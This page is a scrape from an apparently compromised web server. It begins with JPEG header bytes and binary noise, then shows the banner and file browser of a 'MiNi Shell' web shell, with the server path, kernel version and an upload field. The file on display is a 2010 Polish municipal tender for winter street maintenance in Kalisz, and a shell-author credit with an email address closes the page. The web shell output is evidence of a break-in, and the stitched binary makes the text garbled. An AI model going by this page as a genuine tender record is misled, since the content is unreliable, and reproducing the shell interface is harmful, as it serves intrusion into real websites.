JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101013/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101013/284825-N-2010.html

<p class="kh_header"><b>Kalisz: Zimowe utrzymanie ulic na terenie m. Kalisza w sezonie zimowym 2010/2011 
na terenie  REJONU II</b><br>
<b>Numer ogłoszenia: 284825 - 2010; data zamieszczenia: 13.10.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg  Miejskich , ul. Złota 43, 62-800 Kalisz, woj. wielkopolskie, tel. 62 59 85 200, faks 62 59 85 201.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> zp@zdm.kalisz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zimowe utrzymanie ulic na terenie m. Kalisza w sezonie zimowym 2010/2011 
na terenie  REJONU II.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje:
zimowe utrzymanie ulic na terenie miasta Kalisza na podstawowym  
układzie ulic - REJON II.
1. Powierzchnia ulic objętych zimowym utrzymaniem na podstawowym 
układzie ulic - zgodnie  z załącznikiem nr 1 do umowy  zawierającym  wykaz ulic 
wynosi:  

Rejon II - ogółem:   292.071 m2 w tym:
            					 I  standard    132.711 m2
         					 II standard    159.360 m2

 2 Zimowe utrzymanie ulic poza podstawowym układem ulic określonym 
           w punkcie 4.2.1. odbywać się będzie  w sporadycznych przypadkach 
           spowodowanych trudnymi   warunkami stanu  zimowego dróg.

3. Opis przedmiotu zamówienia.
1/ przygotowanie materiałów do zwalczania śliskości zimowej wraz z ich zakupem 
    i transportem
2/ przygotowanie sprzętu do odśnieżania i zwalczania śliskości oraz załadunek 
    materiałów
3/ przygotowanie składowisk, pomieszczeń do kierowania akcją i  systemu 
    łączności
4/ odtwarzanie na bieżąco zapasów materiałów pod kątem zabezpieczenia 
    w trakcie trwania sezonu zimowego 2010/2011
5/ przygotowanie i wyposażenie mikrostacji meteorologicznej oraz zapewnienie 
    łączności telefonicznej
6/ kierowanie akcją zimową w zakresie odśnieżania, zwalczanie śliskości zimowej 
    przy pomocy solanki  lub w szczególnych sytuacjach  mieszaniną  soli
    z  piaskiem zgodnie ze standardami zimowego utrzymania dróg.

4. Ustalenia dotyczące realizacji zamówienia:

1/  Zimowe utrzymanie ulic realizowane będzie przez Wykonawcę poprzez 
     wyznaczonego z jego strony Dyżurnego.

2/ Zimowe utrzymanie dróg zgodnie z ustalonym zakresem i standardami 
    spoczywa na Wykonawcy i ponosi on  pełną odpowiedzialność.

3/ Decyzje  dotyczące rozpoczęcia  i zakończenia akcji zimowej czynnej 
     podejmuje Dyżurny  wyznaczony ze strony Wykonawcy po uprzednim 
     uzyskaniu zgody Dyżurnego wyznaczonego przez Zamawiającego.
     Odpowiedzialność Wykonawcy o której mowa w pkt-cie 2  nie ma 
     zastosowania w przypadku zgłoszenia przez Wykonawcę potrzeby podjęcia 
    akcji zimowej i nie uzyskania akceptacji dyżurnego ze strony  Zamawiającego. 

4/ Zwalczanie śliskości  zimowej odbywać się będzie   przez  posypywanie   
    jezdni solą  ze wstępnym zwilżaniem, a także odśnieżaniem przy użyciu 
    pługów odśnieżnych.

5/ W szczególnie uzasadnionych przypadkach, kiedy zastosowanie solanki  staje 
    się nieefektywne (np. w temp. otoczenia poniżej -10 C ), Wykonawca może 
    zastosować  mieszaninę piasku  z solą. Zastosowanie mieszaniny piasku 
    z solą wymaga zgody Dyżurnego wyznaczonego przez Zamawiającego.

6/ W dniu podpisania umowy Wykonawca  jest zobowiązany  przedstawić do
   akceptacji  ZDM  sposób  gromadzenia danych  o prowadzeniu akcji  zimowej.

7/ Wykonawca jest zobowiązany do zapewnienia łączności pomiędzy dyżurnym,  
    a jednostkami bezpośrednio uczestniczącymi  w prowadzeniu zimowego 
    utrzymania.

8/ Wykonawca w ramach prowadzonych dyżurów przekazuje codziennie meldunki 
    o przebiegu  Akcji zimowej  wg ustalonego przez Zamawiającego wzoru  
    (załącznik nr 3 do siwz) do godz. 830 w sekretariacie Zarządu Dróg Miejskich  
    ul. Złota 43, 62-800 Kalisz.

9/ Meldunki za dni wolne od pracy  (soboty, niedziele, święta) Wykonawca 
    składa pierwszego dnia roboczego, następującego po dniu 
    wolnym  w siedzibie ZDM do godz. 8.30.
      
0/ Wykonawca prowadzi dziennik dyżurów, pracy  sprzętu  i dziennika pogody  
           oraz przyjmuje i odnotowuje zgłaszane interwencje.

5. Wymagania w zakresie realizacji zimowego utrzymania.
1/ Odśnieżanie i zwalczanie śliskości zimowej dróg objętych przedmiotem
zamówienia odbywać się będzie zgodnie z założonymi standardami:

	Opis stanu	Dopuszczalne odstępstwa  od standardu	
Standard	Utrzymania drogi dla danego standardu	Po ustaniu opadów śniegu	Od stwierdzenia występowania zjawisk śliskości   zimowej 
I	jezdnia odśnieżona i posypana na całej długości i szerokości   	Śnieg luźny - do 4 godz.
Błoto pośniegowe - do 6 godz.
Śnieg zajeżdżony - nie dopuszcza się 
Zaspy - nie dopuszcza się 	Gołoledź:- do 3 godz.
Szron:  do 3 godz.
Szadź: do 3 godz.
Śliskość pośniegowa: do 4 godz.
Lodowica: do 4 godz.
II	jezdnia odśnieżona  i posypana na całej długości i szerokości	Śnieg luźny: do 5  godz.
błoto pośniegowe do 7  godz.
Śnieg zajeżdżony,występuje (cienka warstwa nie utrudniająca ruchu)	Gołoledź: do  3 godz.
Szron: do  3 godz.
Szadź: do  3 godz.
Śliskość  pośniegowa do 5  godz.
Lodowica: do  4 godz.

2/ Wykonawca zobowiązany jest do podjęcia akcji czynnej  w ciągu 30 minut                 od momentu wystąpienia danego zjawiska (np. opady śniegu, gołoledź, szron, itp.)             z uwzględnienim zapisu w pkt. 4.4.3/.

3/ Spodardyczne  przypadki spowodowane trudnymi warunkami zimowymi wymagające rozszerzenia akcji zimowej poza podstawowy zakres, nie będą wymagać uzyskania standardów zimowego utrzymania o których mowa wyżej. Zakres zimowego utrzymania w tych przypadkach ograniczać się będzie do odśnieżania z ewentualnym uszorstnieniem nawierzchni.

6/ Materiały 
    
Materiałami stosowanymi  przy zwalczaniu  śliskości  zimowej są:
-	solanka - roztwór soli z wodą  o stężeniu 20%
-    mieszanina  piasku z solą o stężeniu soli w ilości 10  %.  

Zamawiający dopuszcza użycie mieszanki piasku z solą,  w przypadku wystąpienia warunków niekorzystnych (przy tem. Pon. - 10 0C w których użycie solanki staje się nieefektywne.Zastosowanie mieszaniny piasku z solą, wymaga zgody dyżurnego           ze strony Zamawiającego. 

7. Sprzęt.

1/ Wykonawca  powinien  mieć  lub dysponować sprzętem  zapewniającym  
     transport  materiałów  i szybkiego odtworzenia  zapasów na składowisku . 
     Sól  powinna być    transportowana  pod plandekami.

2/ Ilość  potrzebnego sprzętu  powinna  zapewnić  utrzymanie ilości m2 dróg  
    (pkt. 2 Instrukcji dla oferentów), zgodnie z  założonymi  standardami . 
    W przypadku  awarii   sprzętu   uniemożliwiającej realizację   usługi,  wykonawca  
    zobowiązany jest do   podstawienia sprzętu zastępczego na własny  koszt.

3/ Wykonawca  zobowiązany jest do  posiadania  prawidłowo oznakowanego  
    sprzętu, zapewniającego bezpieczeństwo innym użytkownikom drogi i ponosi 
    pełną odpowiedzialność za wszelkie zdarzenia na drodze wynikające  
    z niewłaściwej eksploatacji lub oznakowania sprzętu.

4/ Sprzęt  do zimowego  utrzymania,  Wykonawca wyposaży  w łańcuchy  
    przeciwpoślizgowe w sytuacjach, w których zajdzie konieczność ich 
    zastosowania.

8. Określenia podstawowe.

1/ Śliskość zimowa - powstaje na skutek tworzenia się na jezdni warstw lodu lub  
    zlodowaciałego śniegu.
2/ Gołoledź - warstwa lodu grubości do 1 mm, powstała na skutek opadu na 
    nawierzchnię  o temperaturze ujemnej mgły roszącej, mżawki lub deszczu.
3/ Lodowica - warstwa kilku milimetrów lodu powstała z zamarznięcia nie usuniętej   
     z nawierzchni wody pochodzącej ze stopienia śniegu lub lodu, bądź  opadu 
     deszczu występującej   gdy po odwilży lub opadzie deszczu przy temperaturze    
     dodatniej  następuje raptowne obniżenie temperatury poniżej 0oC.
4/ Zlodowaciały lub ubity śnieg - warstwa kilku milimetrów do znacznej jej grubości, 
     powstałą przez ubicie i przymarznięcie śniegu do nawierzchni
5/ Standard zimowego utrzymania - opis stanu na jezdni przy różnych 
    zjawiskach atmosferycznych zgodnie z pktem 4.5.
6/ Zwalczanie śliskości zimowej - posypywanie jezdni środkami chemicznymi i 
    uszorstniającymi.
7/ Rozsypywarka - nośnik sprzętu (samochód ciężarowy) wraz z zespołem do 
    dozowania i rozsypywania  materiałów, montowanych wraz z pojemnikiem na 
    materiał na wspónej ramie.
8/ Składowisko - miejsce  składowania   materiałów do zwalczania śliskości  
    zimowej o odpowiednio przygotowanym podłożu i systemie odwodnienia z 
    możliwością ich zabezpieczenia przed wpływem warunków  atmosferycznych.
9/ Pług  - konstrukcja  składająca się z lemiesza  i zawiesia montowana  na 
     nośniku zgarniająca  śnieg z nawierzchni i usuwającą go poza krawędź jezdni.
10/ Pług lekki - montowany na ciągnikach rolniczych i samochodach o ładowności 
      ok. 6 t i napędzie na jedną oś - największa grubość odśnieżania do 20 cm.
11/ Pług średni - montowany na samochodach o ładowności  powyżej 6 t i 
       napędzie na 1 lub 2 osie - grubość warstwy odśnieżania do 30 cm.
12/ Solanka - roztwór soli z wodą o stężeniu  20 %.
13/ Dyżurny -
      -  dyżurny ze strony Wykonawcy:  osoba wyznaczona ze strony Wykonawcy do 
         kierowania i kontroli  przebiegu  akcji zimowej, zgodnie z zakresem 
          określonym w punkcie 4.
      -  dyżurny ze stony Zamawiającego:  osoba wyznaczona przez Zamawiającego 
         uprawniona do podejmowania decyzji o prowadzeniu akcji zimowej czynnej 
         oraz decyzji do  rozpoczęcia i zakończenia  akcji zimowej po otrzymaniu 
         zgłoszenia dyżurnego ze strony Wykonawcy a także  nadzorująca cały 
         przebieg  akcji zimowej. 

9. Przy realizacji zamówienia Wykonawca będzie zobowiązany do stosowania 
       jedynie wyrobów dopuszczonych do używania w budownictwie w rozumieniu 
       ustawy z dnia 7 lipca 1994r. Prawo budowlane (Dz. U. z 2006r. Nr 156, poz. 
      1118 z późn. zm.) oraz ustawy o wyrobach budowlanych (Dz. U. z 2004r. Nr 92,  poz. 881) oraz innych przepisów, o ile mają zastosowanie.

10. Wykonawca odpowiedzialny jest za powstałe w toku własnych prac odpady
       oraz za właściwy sposób postępowania z nimi, zgodnie z przepisami ustawy
       z dnia 27 kwietnia 2001r. o odpadach (Dz. U. z 2007r. Nr 39, poz. 251 ze zm.)  oraz ustawy z dnia 13 września 1996r. o utrzymaniu czystości i porządku w 
       gminach (Dz. U. z 2005r. Nr 236, poz. 2007 z późn. zm.). 

11. Zaleca się, aby Wykonawca dokonał wizji lokalnej na terenie objętym przedmiotem zamówienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 6000,00 PLN</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- wykażą należyte wykonanie w ciągu ostatnich 3 lat przed upływem terminu 
     składania ofert, a jeżeli okres prowadzenia działalności jest krótszy
     - w tym okresie, usług związanych z kierowaniem  i prowadzeniem 
     przynajmniej jeden raz  zimowego  utrzymania   w zakresie uszarstniania 
     i odśnieżania  na  drogach  publicznych. 

     Warunek powyższy nie oznacza prowadzenia i kierowania zimowym 
     utrzymaniem dróg w okresie całego sezonu zimowego, może to być  
     miesiąc, tydzień, 1 dzień.

Zamawiający wymaga, aby usługi te były wykonane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a/  wykażą , że posiadają lub mają zapewniony dostęp ( udokumentowany  umową 
        najmu, dzierżawy, użyczenia itp.) do niżej podanych w pełni sprawnych 
        jednostek sprzętu niezbędnego do wykonania przedmiotu zamówienia j.n.:

Minimalny potencjał techniczny do obsługi rejonu :

a)	solarki 1 szt.
b)	pługi lekkie 2 szt.
c)	pługi średnie 1 szt.
d)	piaskarka lub ciągnik  z rozrzutnikiem  1 szt.
e)	urządzenie do wytwarzania solanki 
wraz ze zbiornikami  magazynowymi 1 szt. 

b/  Posiadają  składowisko  materiałów oraz urządzenia do  wytwarzania solanki.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- wykażą, że posiadają (aktualne i opłacone przynajmniej na dzień składania ofert)
  ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej
  działalności gospodarczej związanej z przedmiotem zamówienia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zastrzega sobie prawo   wcześniejszego rozpoczęcia a także  późniejszego zakończenia  prowadzenia zimowego utrzymania ulic  A/z 
w przypadku  wystapienia    niekorzystnych warunków atmosferycznych</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zdm.kalisz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg Miejskich ul. Złota 43, 62-800 Kalisz.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.10.2010 godzina 12:00, miejsce: Zarząd Dróg Miejskich ul. Złota 43, 62-800 Kalisz - SEKRETARIAT pok. nr 201 mieszczący się na I piętrze budynku.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com